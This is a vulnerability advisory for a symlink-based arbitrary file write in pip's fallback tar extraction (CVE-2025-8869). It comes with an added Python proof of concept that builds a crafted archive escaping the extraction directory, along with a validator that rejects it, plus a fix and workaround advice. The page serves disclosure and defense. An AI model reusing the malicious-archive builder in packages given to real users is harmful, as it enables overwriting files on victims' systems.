Symlink Attack Affecting pip package, versions [0,25.2)


Severity: medium (CVSS assessment by Snyk's Security Team)

  • Snyk ID: SNYK-PYTHON-PIP-13045331
  • Published: 25 Sept 2025
  • Disclosed: 24 Sept 2025
  • Credit: Unknown

Introduced: 24 Sep 2025

CVE-2025-8869
CWE-59

How to fix?

Upgrade pip to version 25.2 or higher.

Overview

Affected versions of this package are vulnerable to a Symlink Attack via _untar_without_filter when pip runs on a Python version that does not implement PEP 706 (releases older than 3.9.17, 3.10.12, 3.11.4, or 3.12 on their respective lines). When the fallback extracts a tar archive such as a source distribution, it creates symbolic-link members without validating that the link target stays inside the intended extraction directory. An attacker who entices a user into installing a crafted archive can therefore plant a symlink that points outside the target directory and have later members written through it, producing arbitrary file writes outside the extraction directory.

Note: This is only exploitable through the fallback tar extraction logic used with non-PEP 706 compliant Python versions; on a Python version that implements PEP 706, pip uses the stdlib's extraction filter instead and never reaches the vulnerable fallback code.
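The following is an added example written for this page; it is not pip's or Snyk's code, and the names (build_malicious_archive, find_escaping_members, untar, demo) and the archive layout are illustrative assumptions. It builds a constructed archive in memory whose symlink member points to ../../outside and whose next member is a regular file placed under that link, then extracts it twice into throwaway directories: once with a simplified filter-less loop that mirrors the unchecked behaviour described above, and once with the missing check applied (every member path and every symlink target must resolve inside the destination). It also generalises slightly beyond the page by rejecting absolute link targets and hard links that point outside the destination.

```python
import io
import os
import shutil
import tarfile
import tempfile
from typing import Dict, List


def build_malicious_archive() -> bytes:
    """Constructed sample (not a real sdist): a symlink member whose target
    escapes the extraction directory, followed by a regular file that is
    written *through* that link. Returned as gzip-compressed tar bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        setup = tarfile.TarInfo("pkg-1.0/setup.py")          # ordinary member
        body = b"from setuptools import setup\nsetup(name='pkg')\n"
        setup.size = len(body)
        tar.addfile(setup, io.BytesIO(body))

        link = tarfile.TarInfo("pkg-1.0/escape")             # symlink whose target leaves dest
        link.type = tarfile.SYMTYPE
        link.linkname = "../../outside"  # from <dest>/pkg-1.0/ this is <dest>/../outside
        tar.addfile(link)

        payload = b"owned\n"
        evil = tarfile.TarInfo("pkg-1.0/escape/pwned.txt")   # path looks local, write follows the link
        evil.size = len(payload)
        tar.addfile(evil, io.BytesIO(payload))
    return buf.getvalue()


def is_within_directory(directory: str, target: str) -> bool:
    """Lexical containment check: normalise both paths and require that
    `target` sits under `directory` (handles '..' and absolute targets)."""
    directory = os.path.abspath(directory)
    target = os.path.abspath(target)
    return os.path.commonpath([directory, target]) == directory


def find_escaping_members(tar: tarfile.TarFile, dest: str) -> List[str]:
    """The validation the fallback lacked: reject any member whose own path,
    or whose symlink/hard-link target, would resolve outside `dest`.
    Rejecting the link is enough; the file under it can no longer escape."""
    dest = os.path.abspath(dest)
    bad = []
    for member in tar.getmembers():
        member_path = os.path.join(dest, member.name)
        if not is_within_directory(dest, member_path):
            bad.append(member.name)
            continue
        if member.issym():   # symlink targets are relative to the link's own directory
            target = os.path.join(os.path.dirname(member_path), member.linkname)
        elif member.islnk():  # hard-link targets are archive-relative
            target = os.path.join(dest, member.linkname)
        else:
            continue
        if not is_within_directory(dest, target):
            bad.append(member.name)
    return bad


def escaping_members(data: bytes, dest: str) -> List[str]:
    """Convenience wrapper: scan an archive held in memory without extracting it."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        return find_escaping_members(tar, dest)


def untar(data: bytes, dest: str, validate: bool) -> None:
    """Simplified stand-in for a filter-less extraction loop (not pip's code).
    validate=False creates symlinks from linkname unchecked and opens later
    regular files through them; validate=True refuses the whole archive
    before anything touches disk. Other member types are skipped."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        if validate:
            bad = find_escaping_members(tar, dest)
            if bad:
                raise ValueError(f"refusing to extract, members escape {dest}: {bad}")
        for member in tar.getmembers():
            path = os.path.join(dest, member.name)
            if member.isdir():
                os.makedirs(path, exist_ok=True)
            elif member.issym():
                os.makedirs(os.path.dirname(path), exist_ok=True)
                os.symlink(member.linkname, path)
            elif member.isfile():
                os.makedirs(os.path.dirname(path), exist_ok=True)  # follows the planted symlink
                with tar.extractfile(member) as src, open(path, "wb") as dst:
                    dst.write(src.read())


def demo() -> Dict[str, object]:
    """Extract the sample both ways inside a temp tree; 'outside' stands in
    for the attacker's real target directory (assumed to exist, as ~/.ssh would)."""
    root = tempfile.mkdtemp()
    try:
        outside = os.path.join(root, "outside")
        unchecked = os.path.join(root, "unchecked")
        checked = os.path.join(root, "checked")
        for d in (outside, unchecked, checked):
            os.makedirs(d)
        data = build_malicious_archive()

        untar(data, unchecked, validate=False)
        escaped = os.path.exists(os.path.join(outside, "pwned.txt"))

        try:
            untar(data, checked, validate=True)
            blocked = False
        except ValueError:
            blocked = True
        return {"escaped": escaped, "blocked": blocked, "written_in_checked": os.listdir(checked)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The unchecked run leaves pwned.txt in the sibling `outside` directory even though every member name in the archive starts with pkg-1.0/, which is why checking member names alone is insufficient; the link target itself must be validated. On interpreters with PEP 706, passing filter="data" to tarfile's extraction performs an equivalent rejection, which is what the page means by pip not needing the fallback there.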

Workaround

This vulnerability can be mitigated by running pip on a Python version that implements PEP 706 (e.g., Python >=3.9.17, >=3.10.12, >=3.11.4, or >=3.12), or by inspecting source distributions before installation, for example listing the archive with `tar tvf <sdist>.tar.gz` and refusing any whose entries include symbolic links (type `l`) or paths containing `..`.
